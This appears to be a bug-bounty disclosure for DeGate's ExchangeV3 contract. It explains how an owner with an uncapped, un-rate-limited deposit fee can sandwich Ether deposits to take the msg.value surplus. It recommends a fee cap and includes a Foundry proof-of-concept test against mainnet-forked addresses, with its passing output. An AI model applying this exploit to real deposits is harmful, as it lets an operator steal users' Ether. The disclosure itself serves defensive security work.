Theft of funds from the Default Deposit Contract that requires malicious actions from the DeGate Operator.
Bug Description
Because there is no value limit on deposit fees on the ExchangeV3 contract and because adjusting these fees has no rate-limit, a malicious exchange owner can front-run users who have their msg.value set higher than amount on Ether deposits. This difference in value could be due to user mistake, or a malicious front-end.
Normally a user who deposits Ether with msg.value greater than amount will simply be refunded the difference (assuming no deposit fee), however a malicious exchange owner can steal this value for themselves instead of user refund or revert.
A malicious owner can scan the mempool for any Ether deposit transaction where msg.value is greater than amount. The amount x = msg.value - amount can be directly stolen by the malicious owner by a sandwich attack:
Spot victim transaction and front-run
Temporarily set deposit fee equal to msg.value - amount
Front-run user victim deposits amount instead of intended msg.value
Malicious owner withdraws difference stolen and sets fee back to normal
Users who interact with a malicious front-end or just mistakenly set amount less than msg.value in Ether deposits can have the arbitrarily large difference between these two stolen by a malicious exchange owner. This sandwich attack is trivial for a malicious owner to execute, at very little cost and potentially great profit. The financial impact is unbounded to the upside and can go undetected for a long period of time (given the deposit fees can be toggled between [0, unbounded] with no rate-limit).
Risk Breakdown
Difficulty to Exploit: Easy Weakness: No value limit or rate-limit on deposit fee CVSS2 Score: 8
Add hard-limit to deposit fee to bound attack vector or otherwise rate-limit how often/fast the deposit fee can be changed by owner.
Contracts in scope, Foundry
Proof of concept
Create empty Foundry project:
forge init
Start local anvil fork of mainnet:
anvil --fork-url <mainnet rpc url>
Add the following test suite instead of template:
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.20;
import {Test, console} from "forge-std/Test.sol";
interface IDefaultDepositContract {}
interface IExchange {
function getPendingDepositAmount(address from, address tokenAddress) external returns (uint248);
function setDepositParams(uint256 freeDepositMax, uint256 freeDepositRemained, uint256 freeSlotPerBlock, uint256 depositFee) external;
function deposit(address from, address to, address tokenAddress, uint248 amount, bytes calldata extraData) external payable;
function withdrawExchangeFees(address token, address recipient) external;
contract PoC is Test {
IDefaultDepositContract private immutable defaultDepositContract = IDefaultDepositContract(0x54D7aE423Edb07282645e740C046B9373970a168);
IExchange private immutable exchange = IExchange(0x9C07A72177c5A05410cA338823e790876E79D73B);
function setUp() external {}
function testMaliciousOwnerFrontrunUsers() external {
// Setup accounts
console.log("------Setting up accounts------");
address bob = makeAddr("bob");
vm.label(bob, "bob");
address alice = makeAddr("alice");
vm.label(alice, "alice");
address exchangeOwner = 0x9b93e47b7F61ad1358Bd47Cd01206708E85AE5eD;
vm.label(exchangeOwner, "exchangeOwner");
address ethDepositAddress = address(0);
// Bob and Alice both given 5 ether to deposit
uint248 depositAmount = 5 ether;
deal(bob, depositAmount);
deal(alice, depositAmount);
uint256 bobBalanceBefore = bob.balance;
uint256 aliceBalanceBefore = alice.balance;
uint256 depositBalanceBefore = address(defaultDepositContract).balance;
uint256 exchangeOwnerBalanceBefore = exchangeOwner.balance;
console.log("Bob's ether balance is: %d wei", bobBalanceBefore);
console.log("Alice's ether balance is: %d wei", aliceBalanceBefore);
console.log("Default deposit ether balance is: %d wei", depositBalanceBefore);
console.log("Ether balance of malicious exchange owner is: %d wei", exchangeOwnerBalanceBefore);
// Malicious owner spots sandwich opportunity, either through malicious front-end or by simply watching mempool for user error
console.log("------Bob tries to deposit Ether to ExchangeV3 but mistakenly has 'amount' parameter lower than msg.value sent------");
console.log("------Malicious owner spots sandwich opportunity and front-runs Bob's deposit------");
uint248 maliciousAmount = 1 wei; // Malicious front-end or user error
uint256 freeDepositMax = 0;
uint256 freeDepositRemained = 0;
uint256 freeSlotPerBlock = 0;
uint256 depositFee = depositAmount - maliciousAmount;
exchange.setDepositParams(freeDepositMax, freeDepositRemained, freeSlotPerBlock, depositFee);
console.log("Deposit fee temporarily set to difference between Bob's msg.value and 'amount' (%d wei)", depositFee);
// Bob deposits to ExchangeV3, unaware that he is being front-run
exchange.deposit{value: depositAmount}(bob, bob, ethDepositAddress, maliciousAmount, "");
exchange.withdrawExchangeFees(address(0), exchangeOwner);
assertEq(bob.balance, 0);
assertEq(address(defaultDepositContract).balance, depositBalanceBefore + maliciousAmount);
console.log("Exchange owner collects temporarily inflated fee and withdraws it");
console.log("Exchange owner's ether balance is now: %d wei", exchangeOwner.balance);
assertEq(exchangeOwner.balance, depositFee);
console.log("Bob's ether balance is now: %d wei with a deposit value of: %d wei", bob.balance, exchange.getPendingDepositAmount(bob, ethDepositAddress));
assertEq(exchange.getPendingDepositAmount(bob, ethDepositAddress), maliciousAmount);
// Malicious owner completes sandwich attack on Bob
console.log("Setting deposit fee back to 0 wei, completing sandwich attack on Bob");
depositFee = 0;
exchange.setDepositParams(freeDepositMax, freeDepositRemained, freeSlotPerBlock, depositFee);
console.log("------Alice deposits same Ether amount as Bob, but correctly sets 'amount' parameter and msg.value equal------");
console.log("------Malicious owner has no sandwich opportunity and lets Alice deposit as normal------");
exchange.deposit{value: depositAmount}(alice, alice, ethDepositAddress, depositAmount, "");
assertEq(alice.balance, 0);
assertEq(address(defaultDepositContract).balance, depositBalanceBefore + maliciousAmount + depositAmount);
assertEq(exchange.getPendingDepositAmount(alice, ethDepositAddress), depositAmount);
console.log("Alice's ether balance is now: %d wei with a deposit value of: %d wei", alice.balance, exchange.getPendingDepositAmount(alice, ethDepositAddress));
Run the following forge test:
forge test --match-test testMaliciousOwnerFrontrunUsers --fork-url -vv --via-ir
Output is:
Running 1 test for test/Counter.t.sol:PoC
[32m[PASS][0m testMaliciousOwnerFrontrunUsers() (gas: 276125)
------Setting up accounts------
Bob's ether balance is: 5000000000000000000 wei
Alice's ether balance is: 5000000000000000000 wei
Default deposit ether balance is: 328293880694913421416 wei
Ether balance of malicious exchange owner is: 0 wei
------Bob tries to deposit Ether to ExchangeV3 but mistakenly has 'amount' parameter lower than msg.value sent------
------Malicious owner spots sandwich opportunity and front-runs Bob's deposit------
Deposit fee temporarily set to difference between Bob's msg.value and 'amount' (4999999999999999999 wei)
Exchange owner collects temporarily inflated fee and withdraws it
Exchange owner's ether balance is now: 4999999999999999999 wei
Bob's ether balance is now: 0 wei with a deposit value of: 1 wei
Setting deposit fee back to 0 wei, completing sandwich attack on Bob
------Alice deposits same Ether amount as Bob, but correctly sets 'amount' parameter and msg.value equal------
------Malicious owner has no sandwich opportunity and lets Alice deposit as normal------
Alice's ether balance is now: 0 wei with a deposit value of: 5000000000000000000 wei
Test result: [32mok[0m. [32m1[0m passed; [31m0[0m failed; [33m0[0m skipped; finished in 3.19ms
Ran 1 test suites: [32m1[0m tests passed, [31m0[0m failed, [33m0[0m skipped (1 total tests)